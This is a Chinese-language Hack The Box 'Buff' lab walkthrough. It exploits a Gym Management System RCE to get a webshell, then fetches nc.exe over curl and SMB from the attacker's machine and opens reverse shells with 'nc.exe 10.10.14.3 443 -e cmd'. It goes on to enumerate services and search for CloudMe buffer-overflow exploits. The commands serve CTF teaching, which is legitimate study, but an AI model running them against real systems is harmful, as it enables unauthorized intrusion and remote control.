Buff-htb-writeup

0x00 靶场技能介绍

章节技能：CMS版本漏洞识别、文件传递技能、构造反弹shell技能、端口转发技能、漏洞文件进程与位置识别、漏洞代码修改

参考链接：https://0xdf.gitlab.io/2020/11/21/htb-buff.html

参考链接：https://www.jgeek.cn/article/64

参考链接：https://4wayhandshake.github.io/walkthrough/buff/

0x01 用户权限获取

1、获取下靶机IP地址：10.10.10.198

2、扫描下开放端口情况：

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION

3、访问下目标端口情况，查看网站的应用服务

http://10.10.10.198:8080/contact.php

1 2	`mrb3n's Bro Hut Made using Gym Management Software 1.0`

4、这里发现了CMS的版本信息，直接使用漏洞库进行搜索

┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit Gym Management         
----------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                               |  Path
----------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - 'id' SQL Injection                               | php/webapps/48936.txt
Gym Management System 1.0 - Authentication Bypass                            | php/webapps/48940.txt
Gym Management System 1.0 - Stored Cross Site Scripting                      | php/webapps/48941.txt
Gym Management System 1.0 - Unauthenticated Remote Code Execution            | php/webapps/48506.py
----------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

5、漏洞还是比较多的，这里直接使用命令执行的漏洞进行尝试下

┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit -m php/webapps/48506.py
  Exploit: Gym Management System 1.0 - Unauthenticated Remote Code Execution
      URL: https://www.exploit-db.com/exploits/48506
     Path: /usr/share/exploitdb/exploits/php/webapps/48506.py
    Codes: N/A
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/48506.py
  
  
┌──(kali㉿offsec)-[~/Desktop]
└─$ python2 48506.py
            /\
/vvvvvvvvvvvv \--------------------------------------,                  
`^^^^^^^^^^^^ /============BOKU====================="
            \/

(+) Usage:       python 48506.py <WEBAPP_URL>
(+) Example:     python 48506.py 'https://10.0.0.3:443/gym/'

┌──(kali㉿offsec)-[~/Desktop]
└─$ python2 48506.py 'http://10.10.10.198:8080/'
            /\
/vvvvvvvvvvvv \--------------------------------------,                  
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
�PNG
▒
buff\shaun

C:\xampp\htdocs\gym\upload>

6、命令执行成功，那就获取下第一个flag信息吧

C:\xampp\htdocs\gym\upload> type \users\shaun\desktop\user.txt
�PNG
▒
9be638ffe8266043e9ba9bd4908b9094

C:\xampp\htdocs\gym\upload>

0x02 系统权限获取

7、简单查询下服务器信息

C:\xampp\htdocs\gym\upload> ipconfig
�PNG
▒

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::d1
   IPv6 Address. . . . . . . . . . . : dead:beef::c519:e7:7d70:321e
   Temporary IPv6 Address. . . . . . : dead:beef::4460:cb31:e2b9:7591
   Link-local IPv6 Address . . . . . : fe80::c519:e7:7d70:321e%10
   IPv4 Address. . . . . . . . . . . : 10.10.10.198
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d291%10
                                       10.10.10.2

C:\xampp\htdocs\gym\upload> systeminfo
�PNG
▒

Host Name:                 BUFF
OS Name:                   Microsoft Windows 10 Enterprise
OS Version:                10.0.17134 N/A Build 17134
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          shaun
Registered Organization:   
Product ID:                00329-10280-00000-AA218
Original Install Date:     16/06/2020, 14:05:58
System Boot Time:          25/02/2024, 09:46:54
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
                           [02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.16707776.B64.2008070230, 07/08/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale:             en-us;English (United States)
Input Locale:              en-gb;English (United Kingdom)
Time Zone:                 (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,680 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 3,279 MB
Virtual Memory: In Use:    1,520 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.198
                                 [02]: fe80::c519:e7:7d70:321e
                                 [03]: dead:beef::4460:cb31:e2b9:7591
                                 [04]: dead:beef::c519:e7:7d70:321e
                                 [05]: dead:beef::d1
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

C:\xampp\htdocs\gym\upload>

8、这里的Python的命令执行shell，不太利于后续的执行操作，这里采用几种个方法进行反弹shell的上传：

9、目标靶机存在curl命令，可以通过这个下载nc程序进行反弹shell

C:\xampp\htdocs\gym\upload> curl -h
�PNG
▒
Usage: curl [options...] <url>
     --abstract-unix-socket <path> Connect via abstract Unix domain socket
     --anyauth       Pick any authentication method
 -a, --append        Append to target file when uploading
     --basic         Use HTTP Basic Authentication
     --cacert <CA certificate> CA certificate to verify peer against
     --capath <dir>  CA directory to verify peer against


curl http://10.10.14.3:8000/nc_64_bits.exe -o C:\Users\shaun\Downloads\nc.exe
 

┌──(kali㉿offsec)-[~/Desktop/tools/Reverse-Shell-List]
└─$ python3 -m http.server 8000                 
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.198 - - [25/Feb/2024 17:57:25] "GET /nc_64_bits.exe HTTP/1.1" 200 -


C:\xampp\htdocs\gym\upload> curl http://10.10.14.3:8000/nc.exe -o C:\Users\shaun\Downloads\nc.exe
�PNG
▒

C:\xampp\htdocs\gym\upload> dir C:\Users\shaun\Downloads /a
�PNG
▒
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\Users\shaun\Downloads

25/02/2024  09:57    <DIR>          .
25/02/2024  09:57    <DIR>          ..
16/06/2020  15:26        17,830,824 CloudMe_1112.exe
16/06/2020  21:21               282 desktop.ini
25/02/2024  09:57            43,696 nc.exe
               3 File(s)     17,874,802 bytes
               2 Dir(s)   7,175,868,416 bytes free

C:\xampp\htdocs\gym\upload> 


C:\Users\shaun\Downloads\nc.exe 10.10.14.3 443 -e cmd

C:\Users\shaun\Downloads\nc.exe -e cmd 10.10.14.3 443


C:\xampp\htdocs\gym\upload> C:\Users\shaun\Downloads\nc.exe 10.10.14.3 443 -e cmd

C:\xampp\htdocs\gym\upload> C:\Users\shaun\Downloads\nc.exe -e cmd 10.10.14.3 443

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.198] 49681
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\gym\upload>whoami
whoami
buff\shaun

C:\xampp\htdocs\gym\upload>

10、通过SMB协议上传一个nc进行反弹过来一个交互式的shell

smbserver.py share . -smb2support -username test -password test

net use \\10.10.14.3\share /u:test test

copy \\10.10.14.3\share\nc.exe C:\Users\shaun\Downloads\nc.exe



┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ impacket-smbserver share . -smb2support -username test -password test
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.198,49691)
[*] AUTHENTICATE_MESSAGE (\test,BUFF)
[*] User BUFF\test authenticated successfully
[*] test:::aaaaaaaaaaaaaaaa:620adfacdba45695cc59680d95cb27ce:0101000000000000805daa37e367da01352da589ac34e8e1000000000100100061006b005100610052005500540049000300100061006b0051006100520055005400490002001000480069004d0053004a00640068004e0004001000480069004d0053004a00640068004e0007000800805daa37e367da010600040002000000080030003000000000000000000000000020000006b903bf8f5405e675677e6e169fea1f4774830f77008eccce9cb123501a18130a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e0033000000000000000000
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:share)
[*] Disconnecting Share(1:IPC$)
[*] Connecting Share(3:IPC$)
[*] Disconnecting Share(3:IPC$)


C:\xampp\htdocs\gym\upload> dir C:\Users\shaun\Downloads /a
�PNG
▒
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\Users\shaun\Downloads

25/02/2024  11:54    <DIR>          .
25/02/2024  11:54    <DIR>          ..
16/06/2020  15:26        17,830,824 CloudMe_1112.exe
16/06/2020  21:21               282 desktop.ini
               2 File(s)     17,831,106 bytes
               2 Dir(s)   8,830,144,512 bytes free

C:\xampp\htdocs\gym\upload> net use \\10.10.14.3\share /u:test test
�PNG
▒
The command completed successfully.


C:\xampp\htdocs\gym\upload> dir \\10.10.14.3\share
�PNG
▒
 Volume in drive \\10.10.14.3\share has no label.
 Volume Serial Number is ABCD-EFAA

 Directory of \\10.10.14.3\share

02/02/2024  02:41    <DIR>          frp_0.43.0_linux_amd64
02/02/2024  02:42    <DIR>          frp_0.43.0_linux_arm64
23/02/2024  07:51    <DIR>          htb-portscan
12/11/2023  12:55    <DIR>          pspy
13/05/2005  09:53            68,608 nc.exe
               1 File(s)         84,992 bytes
               4 Dir(s)               0 bytes free

C:\xampp\htdocs\gym\upload> copy \\10.10.14.3\share\nc.exe C:\Users\shaun\Downloads\nc.exe
�PNG
▒
        1 file(s) copied.

C:\xampp\htdocs\gym\upload> dir C:\Users\shaun\Downloads /a
�PNG
▒
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\Users\shaun\Downloads

25/02/2024  12:09    <DIR>          .
25/02/2024  12:09    <DIR>          ..
16/06/2020  15:26        17,830,824 CloudMe_1112.exe
16/06/2020  21:21               282 desktop.ini
13/05/2005  09:53            68,608 nc.exe
               3 File(s)     17,899,714 bytes
               2 Dir(s)   9,022,291,968 bytes free

C:\xampp\htdocs\gym\upload>

11、我们通过获取到的反弹shell，进行基础的信息枚举

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.198] 49686
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\gym\upload>cd C:\
cd C:\

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\

16/06/2020  18:08    <DIR>          PerfLogs
16/06/2020  19:37    <DIR>          Program Files
12/04/2018  09:16    <DIR>          Program Files (x86)
16/06/2020  19:52    <DIR>          Users
18/07/2020  16:35    <DIR>          Windows
16/06/2020  15:40    <DIR>          xampp
               0 File(s)              0 bytes
               6 Dir(s)   7,422,586,880 bytes free

C:\>cd Users
cd Users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\Users

16/06/2020  19:52    <DIR>          .
16/06/2020  19:52    <DIR>          ..
20/07/2020  11:08    <DIR>          Administrator
16/06/2020  14:08    <DIR>          Public
16/06/2020  14:11    <DIR>          shaun
               0 File(s)              0 bytes
               5 Dir(s)   7,423,766,528 bytes free

C:\Users>cd shaun
cd shaun

C:\Users\shaun>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\Users\shaun

16/06/2020  14:11    <DIR>          .
16/06/2020  14:11    <DIR>          ..
16/06/2020  21:21    <DIR>          3D Objects
16/06/2020  21:21    <DIR>          Contacts
14/07/2020  12:27    <DIR>          Desktop
16/06/2020  21:26    <DIR>          Documents
25/02/2024  10:20    <DIR>          Downloads
16/06/2020  21:21    <DIR>          Favorites
16/06/2020  21:21    <DIR>          Links
16/06/2020  21:21    <DIR>          Music
16/06/2020  16:22    <DIR>          OneDrive
16/06/2020  21:21    <DIR>          Pictures
16/06/2020  21:21    <DIR>          Saved Games
16/06/2020  21:21    <DIR>          Searches
16/06/2020  21:21    <DIR>          Videos
               0 File(s)              0 bytes
              15 Dir(s)   7,423,766,528 bytes free

C:\Users\shaun>cd Desktop
cd Desktop

C:\Users\shaun\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\Users\shaun\Desktop

14/07/2020  12:27    <DIR>          .
14/07/2020  12:27    <DIR>          ..
25/02/2024  09:48                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)   7,423,758,336 bytes free

C:\Users\shaun\Desktop>type user.txt
type user.txt
023ebbe863af0c29b3e03f741dc348fd

C:\Users\shaun\Desktop>

12、查看端口监听情况

C:\xampp\htdocs\gym\upload>netstat -ano
netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       952
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       5008
  TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING       7276
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       6536
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       520
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       972
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1464
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       2240
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       668
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       692
  TCP    10.10.10.198:139       0.0.0.0:0              LISTENING       4
  TCP    10.10.10.198:8080      10.10.14.3:37834       ESTABLISHED     6536
  TCP    10.10.10.198:49692     10.10.14.3:443         ESTABLISHED     4664
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       8144
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       8108
  TCP    [::]:135               [::]:0                 LISTENING       952
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:7680              [::]:0                 LISTENING       7276
  TCP    [::]:8080              [::]:0                 LISTENING       6536
  TCP    [::]:49664             [::]:0                 LISTENING       520
  TCP    [::]:49665             [::]:0                 LISTENING       972
  TCP    [::]:49666             [::]:0                 LISTENING       1464
  TCP    [::]:49667             [::]:0                 LISTENING       2240
  TCP    [::]:49668             [::]:0                 LISTENING       668
  TCP    [::]:49669             [::]:0                 LISTENING       692
  UDP    0.0.0.0:123            *:*                                    6480
  UDP    0.0.0.0:5050           *:*                                    5008
  UDP    0.0.0.0:5353           *:*                                    1344
  UDP    0.0.0.0:5355           *:*                                    1344
  UDP    0.0.0.0:60106          *:*                                    1344
  UDP    10.10.10.198:137       *:*                                    4
  UDP    10.10.10.198:138       *:*                                    4
  UDP    10.10.10.198:1900      *:*                                    7448
  UDP    10.10.10.198:49156     *:*                                    7448
  UDP    127.0.0.1:1900         *:*                                    7448
  UDP    127.0.0.1:49157        *:*                                    7448
  UDP    127.0.0.1:64850        *:*                                    3024
  UDP    [::]:123               *:*                                    6480
  UDP    [::]:5353              *:*                                    1344
  UDP    [::]:5355              *:*                                    1344
  UDP    [::]:60106             *:*                                    1344
  UDP    [::1]:1900             *:*                                    7448
  UDP    [::1]:49155            *:*                                    7448
  UDP    [fe80::c519:e7:7d70:321e%10]:1900  *:*                                    7448
  UDP    [fe80::c519:e7:7d70:321e%10]:49154  *:*                                    7448

C:\xampp\htdocs\gym\upload>

C:\xampp\htdocs\gym\upload>netstat -ano | findstr TCP | findstr ":0"
netstat -ano | findstr TCP | findstr ":0"
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       952
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       5008
  TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING       7276
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       6536
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       520
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       972
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1464
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       2240
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       668
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       692
  TCP    10.10.10.198:139       0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       8144
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       4472
  TCP    [::]:135               [::]:0                 LISTENING       952
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:7680              [::]:0                 LISTENING       7276
  TCP    [::]:8080              [::]:0                 LISTENING       6536
  TCP    [::]:49664             [::]:0                 LISTENING       520
  TCP    [::]:49665             [::]:0                 LISTENING       972
  TCP    [::]:49666             [::]:0                 LISTENING       1464
  TCP    [::]:49667             [::]:0                 LISTENING       2240
  TCP    [::]:49668             [::]:0                 LISTENING       668
  TCP    [::]:49669             [::]:0                 LISTENING       692

C:\xampp\htdocs\gym\upload>

13、这里有一个8888的端口，查看下应用程序进程，定位一下这个程序

tasklist /v | findstr 9136

14、这里再定位的时候，发现程序的PID码一直在变，我们整体获取下，看看能否再定位出来

netstat -ano & tasklist

C:\xampp\htdocs\gym\upload>netstat -ano & tasklist
netstat -ano & tasklist

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       952
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       5008
  TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING       7276
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       6536
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       520
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       972
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1464
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       2240
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       668
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       692
  TCP    10.10.10.198:139       0.0.0.0:0              LISTENING       4
  TCP    10.10.10.198:8080      10.10.14.3:37834       ESTABLISHED     6536
  TCP    10.10.10.198:49692     10.10.14.3:443         ESTABLISHED     4664
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       8144
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       3536
  TCP    [::]:135               [::]:0                 LISTENING       952
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:7680              [::]:0                 LISTENING       7276
  TCP    [::]:8080              [::]:0                 LISTENING       6536
  TCP    [::]:49664             [::]:0                 LISTENING       520
  TCP    [::]:49665             [::]:0                 LISTENING       972
  TCP    [::]:49666             [::]:0                 LISTENING       1464
  TCP    [::]:49667             [::]:0                 LISTENING       2240
  TCP    [::]:49668             [::]:0                 LISTENING       668
  TCP    [::]:49669             [::]:0                 LISTENING       692
  UDP    0.0.0.0:123            *:*                                    6480
  UDP    0.0.0.0:5050           *:*                                    5008
  UDP    0.0.0.0:5353           *:*                                    1344
  UDP    0.0.0.0:5355           *:*                                    1344
  UDP    0.0.0.0:56180          *:*                                    1344
  UDP    10.10.10.198:137       *:*                                    4
  UDP    10.10.10.198:138       *:*                                    4
  UDP    10.10.10.198:1900      *:*                                    7448
  UDP    10.10.10.198:49156     *:*                                    7448
  UDP    127.0.0.1:1900         *:*                                    7448
  UDP    127.0.0.1:49157        *:*                                    7448
  UDP    127.0.0.1:64850        *:*                                    3024
  UDP    [::]:123               *:*                                    6480
  UDP    [::]:5353              *:*                                    1344
  UDP    [::]:5355              *:*                                    1344
  UDP    [::]:56180             *:*                                    1344
  UDP    [::1]:1900             *:*                                    7448
  UDP    [::1]:49155            *:*                                    7448
  UDP    [fe80::c519:e7:7d70:321e%10]:1900  *:*                                    7448
  UDP    [fe80::c519:e7:7d70:321e%10]:49154  *:*                                    7448

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0                            0          8 K
System                           4                            0         20 K
Registry                       104                            0      4,020 K
smss.exe                       364                            0        384 K
csrss.exe                      444                            0      1,820 K
wininit.exe                    520                            0      1,104 K
csrss.exe                      532                            1      1,620 K
winlogon.exe                   596                            1      1,572 K
services.exe                   668                            0      6,152 K
lsass.exe                      692                            0      8,564 K
svchost.exe                    796                            0        780 K
svchost.exe                    820                            0     15,800 K
fontdrvhost.exe                844                            0     16,884 K
fontdrvhost.exe                852                            1      1,328 K
svchost.exe                    952                            0      9,060 K
svchost.exe                    996                            0      2,936 K
dwm.exe                        320                            1     28,376 K
svchost.exe                    408                            0      2,948 K
svchost.exe                    972                            0     12,708 K
svchost.exe                   1032                            0      1,868 K
svchost.exe                   1048                            0      4,456 K
svchost.exe                   1156                            0     12,648 K
svchost.exe                   1172                            0      4,108 K
svchost.exe                   1228                            0      3,764 K
svchost.exe                   1404                            0      5,040 K
svchost.exe                   1436                            0      1,736 K
svchost.exe                   1464                            0      8,464 K
svchost.exe                   1472                            0      5,292 K
svchost.exe                   1480                            0      1,348 K
svchost.exe                   1492                            0      5,008 K
svchost.exe                   1504                            0      5,264 K
Memory Compression            1648                            0     25,876 K
svchost.exe                   1676                            0      1,672 K
svchost.exe                   1780                            0      1,288 K
svchost.exe                   1788                            0      4,340 K
svchost.exe                   1812                            0      2,772 K
svchost.exe                   1992                            0      2,028 K
svchost.exe                   2000                            0      3,444 K
svchost.exe                   1316                            0      1,388 K
svchost.exe                   1344                            0      4,460 K
svchost.exe                   1336                            0      2,980 K
svchost.exe                   2100                            0      1,768 K
svchost.exe                   2116                            0      5,032 K
spoolsv.exe                   2240                            0      4,280 K
svchost.exe                   2252                            0      3,720 K
svchost.exe                   2384                            0      3,116 K
svchost.exe                   2640                            0      3,284 K
svchost.exe                   2648                            0     15,516 K
svchost.exe                   2660                            0     26,140 K
svchost.exe                   2668                            0     12,632 K
svchost.exe                   2720                            0      1,308 K
svchost.exe                   2728                            0      3,848 K
vmtoolsd.exe                  2748                            0     10,668 K
VGAuthService.exe             2760                            0      2,304 K
svchost.exe                   2772                            0      1,060 K
SecurityHealthService.exe     2784                            0      4,396 K
svchost.exe                   2792                            0      4,268 K
MsMpEng.exe                   2804                            0    142,356 K
svchost.exe                   2984                            0      1,044 K
svchost.exe                   3024                            0      3,912 K
svchost.exe                   3088                            0      2,716 K
dllhost.exe                   3800                            0      4,704 K
WmiPrvSE.exe                  3960                            0     13,352 K
msdtc.exe                      352                            0      2,348 K
NisSrv.exe                    4604                            0      4,340 K
svchost.exe                   4652                            0     16,296 K
sihost.exe                    4796                            1     14,808 K
svchost.exe                   4848                            1      5,008 K
svchost.exe                   4904                            1     16,996 K
taskhostw.exe                 5012                            1      7,156 K
svchost.exe                   5104                            0      1,548 K
ctfmon.exe                    1096                            1      3,588 K
svchost.exe                   4360                            0      8,616 K
explorer.exe                  5488                            1     38,300 K
svchost.exe                   5840                            0      1,632 K
svchost.exe                   5916                            0      2,880 K
ShellExperienceHost.exe       2468                            1     40,808 K
SearchUI.exe                  5496                            1     84,592 K
RuntimeBroker.exe             5056                            1     12,192 K
svchost.exe                   5008                            0      4,032 K
RuntimeBroker.exe             6160                            1     11,620 K
SearchIndexer.exe             6432                            0     16,816 K
ApplicationFrameHost.exe      6608                            1      8,620 K
MicrosoftEdge.exe             6860                            1     12,936 K
browser_broker.exe            6984                            1      1,620 K
svchost.exe                   7052                            0      1,248 K
Windows.WARP.JITService.e     6188                            0        884 K
RuntimeBroker.exe             5660                            1      1,420 K
svchost.exe                   7232                            0      7,864 K
MicrosoftEdgeCP.exe           7424                            1      4,160 K
MicrosoftEdgeCP.exe           7436                            1      3,576 K
svchost.exe                   7448                            0      1,744 K
svchost.exe                   7880                            0      3,324 K
RuntimeBroker.exe             8088                            1     17,184 K
conhost.exe                   5240                            0        536 K
vmtoolsd.exe                   548                            1      4,604 K
httpd.exe                     6536                            0         60 K
mysqld.exe                    8144                            0      9,308 K
svchost.exe                   8944                            0      2,468 K
svchost.exe                   9168                            1      7,844 K
httpd.exe                     8320                            0      2,416 K
svchost.exe                   7276                            0      7,512 K
SgrmBroker.exe                1412                            0      2,964 K
svchost.exe                   6628                            0      4,240 K
Microsoft.Photos.exe          7764                            1     27,596 K
RuntimeBroker.exe              456                            1     10,328 K
WinStore.App.exe              4228                            1        356 K
RuntimeBroker.exe              328                            1      1,492 K
SystemSettings.exe            2816                            1        696 K
svchost.exe                   3820                            0      2,336 K
taskhostw.exe                 8772                            1     11,476 K
TrustedInstaller.exe          6676                            0      3,940 K
TiWorker.exe                  2248                            0    227,324 K
svchost.exe                   6480                            0      2,480 K
svchost.exe                   3612                            0      2,048 K
svchost.exe                   4196                            0      1,120 K
cmd.exe                       7988                            0        240 K
conhost.exe                   6720                            0        716 K
nc.exe                        4664                            0        452 K
cmd.exe                       3040                            0      1,796 K
cmd.exe                       7092                            0      3,292 K
conhost.exe                   8148                            0     11,076 K
CloudMe.exe                   3536                            0     36,764 K
timeout.exe                   6496                            0      3,968 K
tasklist.exe                  4924                            0      7,760 K

C:\xampp\htdocs\gym\upload>



  Proto  Local Address          Foreign Address        State           PID
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       3536


Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
CloudMe.exe                   3536                            0     36,764 K

15、终于定位出来了，这里可能是因为程序一直在不断的运行结束导致的，这个程序和在download目录的那个程序是同名

1	`16/06/2020 15:26 17,830,824 CloudMe_1112.exe`

16、查找一下，看看有没有漏洞：

┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit CloudMe                                                      
----------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                               |  Path
----------------------------------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC)                                       | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)                              | windows/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)                              | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)                             | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass)                      | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit)               | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow                                  | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt                              | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)                     | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow                                      | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)                   | windows_x86-64/remote/44784.py
----------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

17、searchsploit 中列出的一些漏洞（如上所示）。他们都使用python运行。这给我留下了两个选择：要么在目标本地运行 python，要么从我的攻击者机器运行 python（这需要代理）。因为我不想把 Python 转移到目标上，所以只转移chisel似乎更容易接受。

18、下列命令用于查看该进程的存放位置：

wmic process where "name='CloudMe.exe'"

C:\xampp\htdocs\gym\upload>wmic process where "name='CloudMe.exe'"
wmic process where "name='CloudMe.exe'"
Caption      CommandLine  CreationClassName  CreationDate               CSCreationClassName   CSName  Description  ExecutablePath  ExecutionState  Handle  HandleCount  InstallDate  KernelModeTime  MaximumWorkingSetSize  MinimumWorkingSetSize  Name         OSCreationClassName    OSName                                                                   OtherOperationCount  OtherTransferCount  PageFaults  PageFileUsage  ParentProcessId  PeakPageFileUsage  PeakVirtualSize  PeakWorkingSetSize  Priority  PrivatePageCount  ProcessId  QuotaNonPagedPoolUsage  QuotaPagedPoolUsage  QuotaPeakNonPagedPoolUsage  QuotaPeakPagedPoolUsage  ReadOperationCount  ReadTransferCount  SessionId  Status  TerminationDate  ThreadCount  UserModeTime  VirtualSize  WindowsVersion  WorkingSetSize  WriteOperationCount  WriteTransferCount  
CloudMe.exe               Win32_Process      20240225141200.212184+000  Win32_ComputerSystem  BUFF    CloudMe.exe                                  5720    366                       2968750                                                       CloudMe.exe  Win32_OperatingSystem  Microsoft Windows 10 Enterprise|C:\Windows|\Device\Harddisk0\Partition4  988                  27400               19081       32016          8712             32244              187199488        38592               6         32784384          5720       26                      271                  27                          273                      17                  57681              0                                   15           4062500       184688640    10.0.17134      39485440        22                   1988                


C:\xampp\htdocs\gym\upload>

19、我们首先下下载漏洞利用代码

┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit -m windows/remote/48389.py
  Exploit: CloudMe 1.11.2 - Buffer Overflow (PoC)
